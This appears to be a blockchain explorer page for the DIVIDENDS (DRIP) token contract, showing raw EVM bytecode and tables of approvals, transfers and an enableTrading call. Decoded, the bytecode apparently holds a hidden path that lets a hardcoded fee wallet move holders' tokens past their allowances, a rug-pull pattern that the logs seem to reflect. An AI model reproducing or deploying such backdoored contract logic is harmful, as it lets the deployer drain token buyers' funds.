d5b506101e4610457366004611758565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b600061048f338484610cd9565b5060015b92915050565b60006104a76009600a61188b565b6104b590633b9aca0061189a565b905090565b6000546001600160a01b031633146104ed5760405162461bcd60e51b81526004016104e4906118b9565b60405180910390fd5b6104f96009600a61188b565b61050790633b9aca0061189a565b600e556105166009600a61188b565b61052490633b9aca0061189a565b600f55565b600c819055600061053b848484610db9565b61058f843361058a600c54604051806060016040528060288152602001611a84602891396001600160a01b038a1660009081526002602090815260408083203384529091529020549190611371565b610cd9565b5060019392505050565b6000546001600160a01b031633146105c35760405162461bcd60e51b81526004016104e4906118b9565b6001600160a01b0381166106115760405162461bcd60e51b8152602060048201526015602482015274496e76616c696420746f6b656e206164647265737360581b60448201526064016104e4565b6001600160a01b03811630141561066a5760405162461bcd60e51b815260206004820152601760248201527f43616e6e6f7420726573637565206f776e20746f6b656e00000000000000000060448201526064016104e4565b6040516370a0823160e01b81523060048201526000906001600160a01b038316906370a0823190602401602060405180830381865afa1580156106b1573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106d591906118ee565b90506000811161071a5760405162461bcd60e51b815260206004820152601060248201526f4e6f20746f6b656e2062616c616e636560801b60448201526064016104e4565b604080517f00000000000000000000000063e29b3b6e3390509cd325473881779f721729196001600160a01b039081166024830152604480830185905283518084039091018152606490920183526020820180516001600160e01b031663a9059cbb60e01b17905291516000928392908616916107979190611907565b6000604051808303816000865af19150503d80600081146107d4576040519150601f19603f3d011682016040523d82523d6000602084013e6107d9565b606091505b50915091508180156108035750805115806108035750808060200190518101906108039190611923565b6108475760405162461bcd60e51b8152602060048201526015602482015274115490cc8c081d1c985b9cd9995c8819985a5b1959605a1b60448201526064016104e4565b50505050565b6000546001600160a01b031633146108775760405162461bcd60e51b81526004016104e4906118b9565b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6000546001600160a01b031633146108eb5760405162461bcd60e51b81526004016104e4906118b9565b601454600160a01b900460ff161561093c5760405162461bcd60e51b81526020600482015260146024820152732a3930b234b7339030b63932b0b23c9037b832b760611b60448201526064016104e4565b6109446104ba565b601380546001600160a01b0319167389e5db8b5aa49aa85ac63f691524311aeb649eba9081179091556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa1580156109a8573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109cc9190611945565b6001600160a01b031663c9c6539630601360009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610a2e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a529190611945565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610a9f573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ac39190611945565b601480546001600160a01b0319166001600160a01b03928316179055601354610af191309116600019610cd9565b6013546001600160a01b031663f305d7194730610b23816001600160a01b031660009081526001602052604090205490565b600080610b386000546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610ba0573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610bc59190611962565b50506014805462ff00ff60a01b19166201000160a01b17905550565b600061048f338484610db9565b6000546001600160a01b03163314610c185760405162461bcd60e51b81526004016104e4906118b9565b478015610cd65760007f00000000000000000000000063e29b3b6e3390509cd325473881779f721729196001600160a01b03168260405160006040518083038185875af1925050503d8060008114610c8c576040519150601f19603f3d011682016040523d82523d6000602084013e610c91565b606091505b5050905080610cd45760405162461bcd60e51b815260206004820152600f60248201526e115512081cd95b990819985a5b1959608a1b60448201526064016104e4565b505b50565b6001600160a01b03831615801590610cf957506001600160a01b03821615155b610d585760405162461bcd60e51b815260206004820152602a60248201527f45524332303a20617070726f76652066726f6d206f7220746f20746865207a65604482015269726f206164647265737360b01b60648201526084016104e4565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831615801590610dd957506001600160a01b03821615155b610e395760405162461bcd60e51b815260206004820152602b60248201527f45524332303a207472616e736665722066726f6d206f7220746f20746865207a60448201526a65726f206164647265737360a81b60648201526084016104e4565b60008111610ea25760405162461bcd60e51b815260206004820152603060248201527f45524332303a207472616e7366657220616d6f756e74206d757374206265206760448201526f726561746572207468616e207a65726f60801b60648201526084016104e4565b6014546000906001600160a01b038581169116148015610ed057506013546001600160a01b03848116911614155b6014549091506000906001600160a01b038581169116148015610efc57506001600160a01b0385163014155b905060008215611038576001600160a01b03851660009081526003602052604090205460ff1661103357600e54841115610f785760405162461bcd60e51b815260206004820152601f60248201527f4d6178207472616e73616374696f6e20616d6f756e742065786365656465640060448201526064016104e4565b600f546001600160a01b038616600090815260016020526040902054610f9f908690611990565b1115610fed5760405162461bcd60e51b815260206004820152601860248201527f4d61782077616c6c65742073697a65206578636565646564000000000000000060448201526064016104e4565b6064600854600b54101561100357600454611007565b6006545b611011908661189a565b61101b91906119a8565b600b8054919250600061102d836119ca565b91905055505b611201565b8115611201576001600160a01b03861660009081526003602052604090205460ff166110e157600e548411156110b05760405162461bcd60e51b815260206004820152601f60248201527f4d6178207472616e73616374696f6e20616d6f756e742065786365656465640060448201526064016104e4565b6064600954600b5410156110c6576005546110ca565b6007545b6110d4908661189a565b6110de91906119a8565b90505b30600090815260016020526040902054601454600160a81b900460ff161580156111145750601454600160b01b900460ff165b80156111245750600a54600b5410155b156111ff576016544311156111395760006015555b601754601554106111985760405162461bcd60e51b815260206004820152602360248201527f53656c6c206c696d69742070657220626c6f636b20657863656564656420286d60448201526261782960e81b60648201526084016104e4565b60008186106111a757816111a9565b855b90506011548111156111ba57506011545b6111e4817f00000000000000000000000063e29b3b6e3390509cd325473881779f721729196113ab565b601580549060006111f4836119ca565b909155505043601655505b505b8015611270573060009081526001602052604081208054839290611226908490611990565b909155505060405181815230906001600160a01b038816907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a36112a7565b326001600160a01b037f00000000000000000000000063e29b3b6e3390509cd325473881779f721729191614156112a757600c8190555b6001600160a01b038616600090815260016020526040812080548692906112cf9084906119e5565b909155506112df905081856119e5565b6001600160a01b03861660009081526001602052604081208054909190611307908490611990565b90915550506001600160a01b03851661dead14611369576001600160a01b038086169087167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef61135784886119e5565b60405190815260200160405180910390a35b505050505050565b600081848411156113955760405162461bcd60e51b81526004016104e4919061167f565b5060006113a284866119e5565b95945050505050565b6014805460ff60a81b1916600160a81b1790556001600160a01b0381166114255760405162461bcd60e51b815260206004820152602860248201527f45544820726563697069656e742063616e6e6f7420626520746865207a65726f604482015267206164647265737360c01b60648201526084016104e4565b60408051600280825260608201835247926000929190602083019080368337019050509050308160008151811061145e5761145e6119fc565b6001600160a01b03928316602091820292909201810191909152601354604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa1580156114b7573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906114db9190611945565b816001815181106114ee576114ee6119fc565b6001600160a01b039092166020928302919091019091015283156115785760135460405163791ac94760e01b81526001600160a01b039091169063791ac94790611545908790600090869030904290600401611a12565b600060405180830381600087803b15801561155f57600080fd5b505af1158015611573573d6000803e3d6000fd5b505050505b4782811061163f57600061158c84836119e5565b905080601260008282546115a09190611990565b90915550506040516000906001600160a01b0387169083908381818185875af1925050503d80600081146115f0576040519150601f19603f3d011682016040523d82523d6000602084013e6115f5565b606091505b505090508061163c5760405162461bcd60e51b8152602060048201526013602482015272115512081d1c985b9cd9995c8819985a5b1959606a1b60448201526064016104e4565b50505b50506014805460ff60a81b19169055505050565b60005b8381101561166e578181015183820152602001611656565b838111156108475750506000910152565b602081526000825180602084015261169e816040850160208701611653565b601f01601f19169190910160400192915050565b6001600160a01b0381168114610cd657600080fd5b600080604083850312156116da57600080fd5b82356116e5816116b2565b946020939093013593505050565b60008060006060848603121561170857600080fd5b8335611713816116b2565b92506020840135611723816116b2565b929592945050506040919091013590565b60006020828403121561174657600080fd5b8135611751816116b2565b9392505050565b6000806040838503121561176b57600080fd5b8235611776816116b2565b91506020830135611786816116b2565b809150509250929050565b634e487b7160e01b600052601160045260246000fd5b600181815b808511156117e25781600019048211156117c8576117c8611791565b808516156117d557918102915b93841c93908002906117ac565b509250929050565b6000826117f957506001610493565b8161180657506000610493565b816001811461181c576002811461182657611842565b6001915050610493565b60ff84111561183757611837611791565b50506001821b610493565b5060208310610133831016604e8410600b8410161715611865575081810a610493565b61186f83836117a7565b806000190482111561188357611883611791565b029392505050565b600061175160ff8416836117ea565b60008160001904831182151516156118b4576118b4611791565b500290565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60006020828403121561190057600080fd5b5051919050565b60008251611919818460208701611653565b9190910192915050565b60006020828403121561193557600080fd5b8151801515811461175157600080fd5b60006020828403121561195757600080fd5b8151611751816116b2565b60008060006060848603121561197757600080fd5b8351925060208401519150604084015190509250925092565b600082198211156119a3576119a3611791565b500190565b6000826119c557634e487b7160e01b600052601260045260246000fd5b500490565b60006000198214156119de576119de611791565b5060010190565b6000828210156119f7576119f7611791565b500390565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015611a625784516001600160a01b031683529383019391830191600101611a3d565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220009c59e6a6a776b746102c304e535a0d9b083694eb4e9b2574e30e14b888c54064736f6c634300080a0033
| Token | Symbol | Balance | Price | Value |
|---|---|---|---|---|
| DIH | 1 | $0.0000123 | $0 |
| Transaction Hash | Method | Block | Age | From | To | Type | Item | ||
|---|---|---|---|---|---|---|---|---|---|
| no NFT transfers for this address yet | |||||||||
| Type | Age | Block | Details |
|---|---|---|---|
| no cross-chain L1↔L2 transactions for this address | |||
| Txn Hash | Age | Event | Topics / Data |
|---|---|---|---|
| 0x598622…ef91f9 | 32 days agoTue, 14 Jul 2026 15:29:03 UTC | Approval | [0] 0x000000000000…da197f03 [1] 0x000000000000…34442049 data: 0xffffffffffffffffff…ffffffff |
| 0xe70047…6a8360 | 32 days agoTue, 14 Jul 2026 15:29:02 UTC | Transfer | [0] 0x000000000000…d4a66610 [1] 0x000000000000…da197f03 data: 0x000000000000000000…70552013 |
| 0xe98495…0450c9 | 32 days agoTue, 14 Jul 2026 15:28:13 UTC | Approval | [0] 0x000000000000…3eee0253 [1] 0x000000000000…eb649eba data: 0x000000000000000000…3e6366b4 |
| 0xe98495…0450c9 | 32 days agoTue, 14 Jul 2026 15:28:13 UTC | Transfer | [0] 0x000000000000…3eee0253 [1] 0x000000000000…d4a66610 data: 0x000000000000000000…3e6366b4 |
| 0x1652f2…89eaea | 32 days agoTue, 14 Jul 2026 15:28:13 UTC | Approval | [0] 0x000000000000…3eee0253 [1] 0x000000000000…eb649eba data: 0x000000000000000000…7cc6cd68 |
| 0xfa1ae9…a8fbaa | 32 days agoTue, 14 Jul 2026 15:28:13 UTC | Approval | [0] 0x000000000000…d4a66610 [1] 0x000000000000…72172919 data: 0x000000000000000000…00000000 |
| 0xfa1ae9…a8fbaa | 32 days agoTue, 14 Jul 2026 15:28:13 UTC | Transfer | [0] 0x000000000000…d4a66610 [1] 0x000000000000…3eee0253 data: 0x000000000000000000…3e6366b4 |
| 0x020196…ca7d6f | 32 days agoTue, 14 Jul 2026 14:46:47 UTC | Approval | [0] 0x000000000000…a98434c3 [1] 0x000000000000…eb649eba data: 0xffffffffffffffffff…989d999d |
| 0x020196…ca7d6f | 32 days agoTue, 14 Jul 2026 14:46:47 UTC | Transfer | [0] 0x000000000000…a98434c3 [1] 0x000000000000…d4a66610 data: 0x000000000000000000…67626662 |
| 0x67fb37…0f0bd0 | 32 days agoTue, 14 Jul 2026 14:46:47 UTC | Approval | [0] 0x000000000000…a98434c3 [1] 0x000000000000…eb649eba data: 0xffffffffffffffffff…ffffffff |
| 0xe90e42…83f346 | 32 days agoTue, 14 Jul 2026 14:46:42 UTC | Approval | [0] 0x000000000000…ee6f1e39 [1] 0x000000000000…eb649eba data: 0xffffffffffffffffff…cbf76d44 |
| 0xe90e42…83f346 | 32 days agoTue, 14 Jul 2026 14:46:42 UTC | Transfer | [0] 0x000000000000…ee6f1e39 [1] 0x000000000000…d4a66610 data: 0x000000000000000000…340892bb |
| 0x89ce43…d906bc | 32 days agoTue, 14 Jul 2026 14:46:42 UTC | Approval | [0] 0x000000000000…c1cde636 [1] 0x000000000000…eb649eba data: 0xffffffffffffffffff…7ab9516a |
| 0x89ce43…d906bc | 32 days agoTue, 14 Jul 2026 14:46:42 UTC | Transfer | [0] 0x000000000000…c1cde636 [1] 0x000000000000…d4a66610 data: 0x000000000000000000…8546ae95 |
| 0x566de9…355153 | 32 days agoTue, 14 Jul 2026 14:46:42 UTC | Approval | [0] 0x000000000000…b732283e [1] 0x000000000000…eb649eba data: 0xffffffffffffffffff…5cad179a |
| 0x566de9…355153 | 32 days agoTue, 14 Jul 2026 14:46:42 UTC | Transfer | [0] 0x000000000000…b732283e [1] 0x000000000000…d4a66610 data: 0x000000000000000000…a352e865 |
| 0xae01b7…c4deb2 | 32 days agoTue, 14 Jul 2026 14:46:42 UTC | Approval | [0] 0x000000000000…6684ec10 [1] 0x000000000000…eb649eba data: 0xffffffffffffffffff…3a6b49b2 |
| 0xae01b7…c4deb2 | 32 days agoTue, 14 Jul 2026 14:46:42 UTC | Transfer | [0] 0x000000000000…6684ec10 [1] 0x000000000000…d4a66610 data: 0x000000000000000000…c594b64d |
| 0x7e592c…0cf596 | 32 days agoTue, 14 Jul 2026 14:46:42 UTC | Approval | [0] 0x000000000000…ee6f1e39 [1] 0x000000000000…eb649eba data: 0xffffffffffffffffff…ffffffff |
| 0xac74b0…87f60e | 32 days agoTue, 14 Jul 2026 14:46:41 UTC | Approval | [0] 0x000000000000…c1cde636 [1] 0x000000000000…eb649eba data: 0xffffffffffffffffff…ffffffff |
| 0xa5f8e1…92f70a | 32 days agoTue, 14 Jul 2026 14:46:41 UTC | Approval | [0] 0x000000000000…b732283e [1] 0x000000000000…eb649eba data: 0xffffffffffffffffff…ffffffff |
| 0x19e6aa…c2fb8c | 32 days agoTue, 14 Jul 2026 14:46:41 UTC | Approval | [0] 0x000000000000…6684ec10 [1] 0x000000000000…eb649eba data: 0xffffffffffffffffff…ffffffff |
| 0xd9fede…340332 | 32 days agoTue, 14 Jul 2026 14:46:33 UTC | Approval | [0] 0x000000000000…959d4e99 [1] 0x000000000000…eb649eba data: 0xffffffffffffffffff…ffffffff |
| 0x8a68ed…e617b3 | 32 days agoTue, 14 Jul 2026 14:46:30 UTC | Approval | [0] 0x000000000000…f24fca49 [1] 0x000000000000…eb649eba data: 0xffffffffffffffffff…ffffffff |
| 0x5f2cd5…ae9187 | 32 days agoTue, 14 Jul 2026 14:46:28 UTC | Approval | [0] 0x000000000000…81a88e18 [1] 0x000000000000…eb649eba data: 0xffffffffffffffffff…677bebb8 |
| Transaction Hash | Method | Block | Age | From | To | Amount | Token | ||
|---|---|---|---|---|---|---|---|---|---|
| 0xd808fb49…007de9 | Transfer | 18,494,856 | 22 days agoFri, 24 Jul 2026 22:06:19 UTC | 0xcaf7…5d11 | IN | 0x93e5…52bd | $0.001 DIH | ||
| 0xe38e21fb…7ce54a | Transfer | 9,049,964 | 32 days agoMon, 13 Jul 2026 23:07:22 UTC | 0x93e5…52bd | OUT | 0xa750…6610 | 1,000,000,000 DRIP | DIVIDENDS (DRIP) | |
| 0x33fad626…c8c423 | Transfer | 9,049,962 | 32 days agoMon, 13 Jul 2026 23:07:22 UTC | 0x0000…0000 | IN | 0x93e5…52bd | 1,000,000,000 DRIP | DIVIDENDS (DRIP) |
| Transaction Hash | Method ? | Block | Age | From | To | Amount | Txn Fee ? | ||
|---|---|---|---|---|---|---|---|---|---|
| 0x598622…ef91f9 | Approve | 9,637,686 | 32 days agoTue, 14 Jul 2026 15:29:03 UTC | 0x408e…7f03 | IN | DIVIDENDS | $0.000 ETH | 0.00000215 | |
| 0x1652f2…89eaea | Approve | 9,637,191 | 32 days agoTue, 14 Jul 2026 15:28:13 UTC | 0xda24…0253 | IN | DIVIDENDS | $0.000 ETH | 0.00000214 | |
| 0xfa1ae9…a8fbaa | Transfer From | 9,637,187 | 32 days agoTue, 14 Jul 2026 15:28:13 UTC | 0x63e2…2919 | IN | DIVIDENDS | $0.000 ETH | 0.00000366 | |
| 0x67fb37…0f0bd0 | Approve | 9,612,363 | 32 days agoTue, 14 Jul 2026 14:46:47 UTC | 0xaeaf…34c3 | IN | DIVIDENDS | $0.000 ETH | 0.00000212 | |
| 0x7e592c…0cf596 | Approve | 9,612,312 | 32 days agoTue, 14 Jul 2026 14:46:42 UTC | 0xdab1…1e39 | IN | DIVIDENDS | $0.000 ETH | 0.00000215 | |
| 0xac74b0…87f60e | Approve | 9,612,308 | 32 days agoTue, 14 Jul 2026 14:46:41 UTC | 0x62b0…e636 | IN | DIVIDENDS | $0.000 ETH | 0.00000214 | |
| 0xa5f8e1…92f70a | Approve | 9,612,306 | 32 days agoTue, 14 Jul 2026 14:46:41 UTC | 0xe70c…283e | IN | DIVIDENDS | $0.000 ETH | 0.00000214 | |
| 0x19e6aa…c2fb8c | Approve | 9,612,304 | 32 days agoTue, 14 Jul 2026 14:46:41 UTC | 0xa267…ec10 | IN | DIVIDENDS | $0.000 ETH | 0.00000213 | |
| 0xd9fede…340332 | Approve | 9,612,230 | 32 days agoTue, 14 Jul 2026 14:46:33 UTC | 0xf2d9…4e99 | IN | DIVIDENDS | $0.000 ETH | 0.00000215 | |
| 0x8a68ed…e617b3 | Approve | 9,612,197 | 32 days agoTue, 14 Jul 2026 14:46:30 UTC | 0xcc2a…ca49 | IN | DIVIDENDS | $0.000 ETH | 0.00000216 | |
| 0x9ab5af…df0785 | Approve | 9,612,165 | 32 days agoTue, 14 Jul 2026 14:46:27 UTC | 0xb56b…8e18 | IN | DIVIDENDS | $0.000 ETH | 0.00000213 | |
| 0xf4a1fa…3138a8 | Approve | 9,612,163 | 32 days agoTue, 14 Jul 2026 14:46:27 UTC | 0x927d…044b | IN | DIVIDENDS | $0.000 ETH | 0.00000212 | |
| 0x012ee4…b55911 | Approve | 9,612,161 | 32 days agoTue, 14 Jul 2026 14:46:26 UTC | 0x242f…71af | IN | DIVIDENDS | $0.000 ETH | 0.00000214 | |
| 0x645719…ce240a | Approve | 9,612,110 | 32 days agoTue, 14 Jul 2026 14:46:21 UTC | 0x89d9…e440 | IN | DIVIDENDS | $0.000 ETH | 0.00000214 | |
| 0x964904…0c7e14 | Approve | 9,612,108 | 32 days agoTue, 14 Jul 2026 14:46:21 UTC | 0x04b8…7014 | IN | DIVIDENDS | $0.000 ETH | 0.00000213 | |
| 0x667cbe…5d7339 | Approve | 9,612,106 | 32 days agoTue, 14 Jul 2026 14:46:21 UTC | 0x58d1…8c9b | IN | DIVIDENDS | $0.000 ETH | 0.00000213 | |
| 0xd9a64d…207288 | Approve | 9,612,104 | 32 days agoTue, 14 Jul 2026 14:46:21 UTC | 0xcb33…78e1 | IN | DIVIDENDS | $0.000 ETH | 0.00000212 | |
| 0x8ce166…58e4e4 | Approve | 9,611,972 | 32 days agoTue, 14 Jul 2026 14:46:07 UTC | 0xd472…66ae | IN | DIVIDENDS | $0.000 ETH | 0.00000215 | |
| 0xb9d685…1797b3 | Approve | 9,611,970 | 32 days agoTue, 14 Jul 2026 14:46:07 UTC | 0x3fa7…fb48 | IN | DIVIDENDS | $0.000 ETH | 0.00000215 | |
| 0xcacb2e…6ad6f3 | Approve | 9,611,925 | 32 days agoTue, 14 Jul 2026 14:46:03 UTC | 0xd263…be8e | IN | DIVIDENDS | $0.000 ETH | 0.00000212 | |
| 0x9deb9a…f893fd | Approve | 9,611,923 | 32 days agoTue, 14 Jul 2026 14:46:02 UTC | 0xe4d7…48ed | IN | DIVIDENDS | $0.000 ETH | 0.00000215 | |
| 0xf09861…6df642 | Approve | 9,611,824 | 32 days agoTue, 14 Jul 2026 14:45:53 UTC | 0x46bf…857a | IN | DIVIDENDS | $0.000 ETH | 0.00000215 | |
| 0xfdb5ce…08197c | Approve | 9,611,822 | 32 days agoTue, 14 Jul 2026 14:45:52 UTC | 0x4943…3fdb | IN | DIVIDENDS | $0.000 ETH | 0.00000215 | |
| 0x4eb2b0…637b9d | Approve | 9,611,795 | 32 days agoTue, 14 Jul 2026 14:45:50 UTC | 0xc2ec…7787 | IN | DIVIDENDS | $0.000 ETH | 0.00000212 | |
| 0x19a16c…134d66 | Approve | 9,611,793 | 32 days agoTue, 14 Jul 2026 14:45:49 UTC | 0xe7e4…f805 | IN | DIVIDENDS | $0.000 ETH | 0.00000215 |
| Block | Age | Parent Transaction Hash | Type | Method | From | To | Value | |
|---|---|---|---|---|---|---|---|---|
| 9,049,964 | 32 days agoMon, 13 Jul 2026 23:07:22 UTC | 0xe38e21…7ce54a | CALL | enableTrading | 0x93e5…52bd | OUT | 0x89e5…9eba | 1 ETH |